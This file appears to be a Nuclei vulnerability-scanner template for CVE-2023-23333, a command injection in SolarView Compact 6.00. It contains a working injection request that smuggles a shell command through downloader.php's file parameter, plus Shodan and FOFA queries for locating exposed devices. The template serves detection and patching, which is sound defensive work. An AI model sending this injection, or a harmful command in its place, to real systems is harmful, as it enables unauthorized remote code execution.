68 lines
2.3 KiB
YAML
68 lines
2.3 KiB
YAML
id: CVE-2023-23333
|
|
|
|
info:
|
|
name: SolarView Compact 6.00 - OS Command Injection
|
|
author: Mr-xn
|
|
severity: critical
|
|
description: |
|
|
SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system.
|
|
remediation: |
|
|
Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00.
|
|
reference:
|
|
- https://github.com/Timorlover/CVE-2023-23333
|
|
- https://github.com/Mr-xn/CVE-2023-23333
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-23333
|
|
- http://packetstormsecurity.com/files/174537/SolarView-Compact-6.00-Remote-Command-Execution.html
|
|
- https://github.com/h00die-gr3y/Metasploit
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-23333
|
|
cwe-id: CWE-77
|
|
epss-score: 0.96326
|
|
epss-percentile: 0.99545
|
|
cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: contec
|
|
product: solarview_compact_firmware
|
|
shodan-query:
|
|
- http.html:"SolarView Compact"
|
|
- http.favicon.hash:"-244067125"
|
|
- http.html:"solarview compact"
|
|
- cpe:"cpe:2.3:o:contec:solarview_compact_firmware"
|
|
fofa-query:
|
|
- body="SolarView Compact" && title="Top"
|
|
- body="solarview compact" && title="top"
|
|
- icon_hash="-244067125"
|
|
- body="solarview compact"
|
|
tags: cve,cve2023,packetstorm,solarview,rce,contec
|
|
variables:
|
|
cmd: "echo+CVE-2023-23333|rev"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 25s
|
|
GET /downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- '33332-3202-EVC'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450221009fd301a49f781f20f79d27691a17df28fa811e791487a27f5f9a01786667c31c022001ba5c53e062dc8f144f958b19d7064d2f69ad1d9b92d0aa426ca44268bc153c:922c64590222798bb761d5b6d8e72950 |